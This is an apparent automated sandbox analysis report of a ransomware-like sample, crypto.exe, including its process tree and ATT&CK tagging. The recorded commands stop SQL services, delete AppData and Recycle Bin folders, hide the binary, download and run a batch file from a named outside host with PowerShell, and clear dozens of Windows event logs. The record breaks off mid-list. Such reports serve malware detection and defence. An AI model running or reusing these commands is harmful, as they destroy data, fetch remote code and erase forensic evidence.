PID 992 wrote to memory of 1472	992	cmd.exe	538
PID 992 wrote to memory of 1528	992	cmd.exe	539
PID 992 wrote to memory of 1528	992	cmd.exe	539
PID 992 wrote to memory of 1528	992	cmd.exe	539
PID 992 wrote to memory of 1828	992	cmd.exe	540
PID 992 wrote to memory of 1828	992	cmd.exe	540
PID 992 wrote to memory of 1828	992	cmd.exe	540
PID 992 wrote to memory of 1512	992	cmd.exe	541
PID 992 wrote to memory of 1512	992	cmd.exe	541
PID 992 wrote to memory of 1512	992	cmd.exe	541
PID 992 wrote to memory of 1564	992	cmd.exe	542
PID 992 wrote to memory of 1564	992	cmd.exe	542
PID 992 wrote to memory of 1564	992	cmd.exe	542
PID 992 wrote to memory of 1400	992	cmd.exe	543
PID 992 wrote to memory of 1400	992	cmd.exe	543
PID 992 wrote to memory of 1400	992	cmd.exe	543
PID 992 wrote to memory of 1944	992	cmd.exe	544
PID 992 wrote to memory of 1944	992	cmd.exe	544
PID 992 wrote to memory of 1944	992	cmd.exe	544
PID 992 wrote to memory of 1792	992	cmd.exe	545
PID 992 wrote to memory of 1792	992	cmd.exe	545
PID 992 wrote to memory of 1792	992	cmd.exe	545
PID 992 wrote to memory of 1644	992	cmd.exe	546
PID 992 wrote to memory of 1644	992	cmd.exe	546
PID 992 wrote to memory of 1644	992	cmd.exe	546
PID 992 wrote to memory of 1876	992	cmd.exe	547
PID 992 wrote to memory of 1876	992	cmd.exe	547
PID 992 wrote to memory of 1876	992	cmd.exe	547
PID 992 wrote to memory of 1820	992	cmd.exe	548
PID 992 wrote to memory of 1820	992	cmd.exe	548
PID 992 wrote to memory of 1820	992	cmd.exe	548
PID 992 wrote to memory of 600	992	cmd.exe	549
PID 992 wrote to memory of 600	992	cmd.exe	549
PID 992 wrote to memory of 600	992	cmd.exe	549
PID 992 wrote to memory of 1200	992	cmd.exe	550
PID 992 wrote to memory of 1200	992	cmd.exe	550
PID 992 wrote to memory of 1200	992	cmd.exe	550
PID 992 wrote to memory of 860	992	cmd.exe	551
PID 992 wrote to memory of 860	992	cmd.exe	551
PID 992 wrote to memory of 860	992	cmd.exe	551
PID 992 wrote to memory of 1408	992	cmd.exe	552
PID 992 wrote to memory of 1408	992	cmd.exe	552
PID 992 wrote to memory of 1408	992	cmd.exe	552
PID 992 wrote to memory of 564	992	cmd.exe	553
PID 992 wrote to memory of 564	992	cmd.exe	553
PID 992 wrote to memory of 564	992	cmd.exe	553
PID 992 wrote to memory of 1060	992	cmd.exe	554
PID 992 wrote to memory of 1060	992	cmd.exe	554
PID 992 wrote to memory of 1060	992	cmd.exe	554
PID 992 wrote to memory of 1840	992	cmd.exe	555
PID 992 wrote to memory of 1840	992	cmd.exe	555
PID 992 wrote to memory of 1840	992	cmd.exe	555
PID 992 wrote to memory of 624	992	cmd.exe	556
PID 992 wrote to memory of 624	992	cmd.exe	556
PID 992 wrote to memory of 624	992	cmd.exe	556
PID 992 wrote to memory of 1040	992	cmd.exe	557
PID 992 wrote to memory of 1040	992	cmd.exe	557
PID 992 wrote to memory of 1040	992	cmd.exe	557
PID 992 wrote to memory of 1688	992	cmd.exe	558
PID 992 wrote to memory of 1688	992	cmd.exe	558
PID 992 wrote to memory of 1688	992	cmd.exe	558
PID 992 wrote to memory of 328	992	cmd.exe	559
PID 992 wrote to memory of 328	992	cmd.exe	559
PID 992 wrote to memory of 328	992	cmd.exe	559
PID 992 wrote to memory of 2032	992	cmd.exe	560
PID 992 wrote to memory of 2032	992	cmd.exe	560
PID 992 wrote to memory of 2032	992	cmd.exe	560
PID 992 wrote to memory of 1152	992	cmd.exe	561
PID 992 wrote to memory of 1152	992	cmd.exe	561
PID 992 wrote to memory of 1152	992	cmd.exe	561
PID 992 wrote to memory of 1880	992	cmd.exe	562
PID 992 wrote to memory of 1880	992	cmd.exe	562
PID 992 wrote to memory of 1880	992	cmd.exe	562
PID 992 wrote to memory of 972	992	cmd.exe	563
PID 992 wrote to memory of 972	992	cmd.exe	563
PID 992 wrote to memory of 972	992	cmd.exe	563
PID 992 wrote to memory of 1272	992	cmd.exe	564
PID 992 wrote to memory of 1272	992	cmd.exe	564
PID 992 wrote to memory of 1272	992	cmd.exe	564
PID 992 wrote to memory of 908	992	cmd.exe	565
PID 992 wrote to memory of 908	992	cmd.exe	565
PID 992 wrote to memory of 908	992	cmd.exe	565
PID 992 wrote to memory of 1980	992	cmd.exe	566
PID 992 wrote to memory of 1980	992	cmd.exe	566
PID 992 wrote to memory of 1980	992	cmd.exe	566
PID 992 wrote to memory of 952	992	cmd.exe	567
PID 992 wrote to memory of 952	992	cmd.exe	567
PID 992 wrote to memory of 952	992	cmd.exe	567
PID 992 wrote to memory of 1804	992	cmd.exe	568
PID 992 wrote to memory of 1804	992	cmd.exe	568
PID 992 wrote to memory of 1804	992	cmd.exe	568
PID 992 wrote to memory of 1996	992	cmd.exe	569
PID 992 wrote to memory of 1996	992	cmd.exe	569
PID 992 wrote to memory of 1996	992	cmd.exe	569
PID 992 wrote to memory of 1112	992	cmd.exe	570
PID 992 wrote to memory of 1112	992	cmd.exe	570
PID 992 wrote to memory of 1112	992	cmd.exe	570
PID 1296 wrote to memory of 2024	1296	crypto.exe	571
PID 1296 wrote to memory of 2024	1296	crypto.exe	571
PID 1296 wrote to memory of 2024	1296	crypto.exe	571
PID 1296 wrote to memory of 432	1296	crypto.exe	572
PID 1296 wrote to memory of 432	1296	crypto.exe	572
PID 1296 wrote to memory of 432	1296	crypto.exe	572
PID 1296 wrote to memory of 1564	1296	crypto.exe	573
PID 1296 wrote to memory of 1564	1296	crypto.exe	573
PID 1296 wrote to memory of 1564	1296	crypto.exe	573
PID 1296 wrote to memory of 288	1296	crypto.exe	574
PID 1296 wrote to memory of 288	1296	crypto.exe	574
PID 1296 wrote to memory of 288	1296	crypto.exe	574
PID 600 wrote to memory of 864	600	iexplore.exe	582
PID 600 wrote to memory of 864	600	iexplore.exe	582
PID 600 wrote to memory of 864	600	iexplore.exe	582
PID 600 wrote to memory of 864	600	iexplore.exe	582

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1028	attrib.exe

C:\Users\Admin\AppData\Local\Temp\crypto.exe
"C:\Users\Admin\AppData\Local\Temp\crypto.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\system32\cmd.exe
  cmd /C "reg add HKEY_CLASSES_ROOT\.sec\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,152 /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\system32\reg.exe
    reg add HKEY_CLASSES_ROOT\.sec\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,152 /f
    3⤵
    - Modifies registry class
    PID:1520
- C:\Windows\system32\cmd.exe
  cmd /C "taskkill /F /IM sqlservr.exe /T"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sqlservr.exe /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1804
- C:\Windows\system32\cmd.exe
  cmd /C "taskkill /F /IM sqlceip.exe /T"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sqlceip.exe /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- C:\Windows\system32\cmd.exe
  cmd /C "taskkill /F /IM sqlwriter.exe /T"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sqlwriter.exe /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\Users\Admin\AppData /s /q"
  2⤵
  PID:324
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\Users\Default\AppData /s /q"
  2⤵
  PID:572
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\Users\Public\AppData /s /q"
  2⤵
  PID:1356
- C:\Windows\system32\cmd.exe
  cmd /C "attrib +h +s Crypto.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:800
- - C:\Windows\system32\attrib.exe
    attrib +h +s Crypto.exe
    3⤵
    - Views/modifies file attributes
    PID:1028
- C:\Windows\system32\cmd.exe
  cmd /C "net stop MSSQL$SQLEXPRESS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1216
- - C:\Windows\system32\net.exe
    net stop MSSQL$SQLEXPRESS
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
      4⤵
      PID:824
- C:\Windows\system32\cmd.exe
  cmd /C "net stop MSSQLSERVER /f /m"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:328
- - C:\Windows\system32\net.exe
    net stop MSSQLSERVER /f /m
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /f /m
      4⤵
      PID:688
- C:\Windows\system32\cmd.exe
  cmd /C "net stop SQLWriter"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1864
- - C:\Windows\system32\net.exe
    net stop SQLWriter
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:388
- C:\Windows\system32\cmd.exe
  cmd /C "net stop SQLTELEMETRY"
  2⤵
  PID:1872
- - C:\Windows\system32\net.exe
    net stop SQLTELEMETRY
    3⤵
    PID:316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY
      4⤵
      PID:1080
- C:\Windows\system32\cmd.exe
  cmd /C "net stop SQLSERVERAGENT"
  2⤵
  PID:2044
- - C:\Windows\system32\net.exe
    net stop SQLSERVERAGENT
    3⤵
    PID:2012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT
      4⤵
      PID:1608
- C:\Windows\system32\cmd.exe
  cmd /C "net stop SQLBrowser"
  2⤵
  PID:1492
- - C:\Windows\system32\net.exe
    net stop SQLBrowser
    3⤵
    PID:1560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:1496
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\$Recycle.Bin /s /q"
  2⤵
  PID:1532
- C:\Windows\system32\cmd.exe
  cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')"
  2⤵
  PID:1060
- - C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')
    3⤵
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- C:\Windows\system32\cmd.exe
  cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')"
  2⤵
  PID:1356
- - C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')
    3⤵
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:928
- C:\Windows\system32\cmd.exe
  cmd /C C:\Users\Public\Music\clear.bat
  2⤵
  PID:992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit
    3⤵
    PID:660
  - - C:\Windows\system32\bcdedit.exe
      bcdedit
      4⤵
      PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:316
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DebugChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Media Center"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:1232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
